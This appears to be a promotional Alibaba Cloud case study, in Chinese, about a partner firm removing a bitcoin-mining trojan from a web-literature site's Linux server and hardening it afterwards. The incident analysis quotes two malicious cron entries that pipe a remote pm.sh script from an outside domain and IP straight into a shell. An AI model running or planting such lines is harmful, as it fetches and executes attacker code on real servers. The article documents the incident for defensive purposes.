上周末起,大规模网络勒索袭击迅速波及全球百余国家和地区,病毒锁死用户数据和电脑文件,要用户支付价值300-
600美元的比特币赎金,成为刷屏级新闻。
比特币是一种网络虚拟货币,主要基于一套密码编码、通过复杂算法产生,任何人都可以下载运行比特币客户端参与制造比特币,这个过程也被形象地称为“挖矿”。而比特币“挖矿木马”,就是由黑客通过木马控制大量肉鸡电脑,为其制造比特币的恶意程序。
警方缴获的比特币“挖矿机”
阿里云服务的客户中,就有中过招的。
北京新华先锋出版科技有限公司是一家专业从事图书策划、代理出版和营销推广的现代化综合性文化产业机构,其旗下子公司北京酷读文化有限公司,负责运营网络文学网站——酷读网,签有国内知名的网络作家,颇具影响力。
在2016年11月份,网站开始出现CPU、内存资源消耗异常,网站响应速度变慢,而用户访问量没有明显变化。技术团队几经排查处理,仍不能消除故障。新华先锋希望找到专业运维人员,一来快速解决问题,恢复网站正常运营,二来长期为网站保驾护航,保障系统稳定,自身集中精力拓展业务。
多方考察,选择了阿里云生态服务合作伙伴博伟来提供服务保障。通过技术诊断,发现网站遭到了“比特币挖矿木马”的入侵。有些木马病毒的高级版本,可以篡改Linux的基础命令,技术人员很难用一般的方法找到木马进程。技术人员需要结合运维经验、网上的资料、用户故障时间点和系统log分析等综合手段才能定位问题。
新华先锋中的木马就是如此。黑客利用系统漏洞,通过web脚本植入该木马,盗用服务器资源进行比特币开采计算。通过下载并分析该木马脚本文件,博伟技术人员发现该木马修改了系统登录认证配置、计划任务、创建采矿进程进行数据接收和处理,同时伪造系统服务,充当守护进程。
l 被篡改的计划任务:
/10 * curl -fsSL http://www.haveabitchin.com/pm.sh?1116 | sh
/1 * root curl -fs http://101.55.126.66:8990/pm.sh | bash
l 木马文件:
l 木马守护进程:
l 被篡改的SSH配置:
博伟技术人员指导新华先锋完成数据备份,清理了木马进程、守护进程,恢复被篡改的配置文件和计划任务等,在系统恢复正常后进行了一系列加固操作:缓存数据库Redis、IP绑定/密码验证/更换端口、ROOT登录限制/密码修改、Mysql、FTP、SSH端口更换、IPtable访问控制,阿里云ECS实例的安全组IP/端口限制/快照备份。
好在该木马只是利用服务器资源进行计算,并没有盗用或毁坏用户数据,由于及时查杀木马修复漏洞,避免了用户资料泄露和加密敲诈勒索等更严重的后果。
经过此次故障处理及技术人员的日常巡检,现在用户系统运行平稳。博伟也一直在给新华先锋提供7*24小时的运维保障,让新华先锋得以专注自己的业务,在文化出版领域一展拳脚。
想要更多了解生态合作伙伴提供的服务内容,
欢迎进入阿里云官网-支持-区域服务查看!链接:https://www.aliyun.com/support/quyu
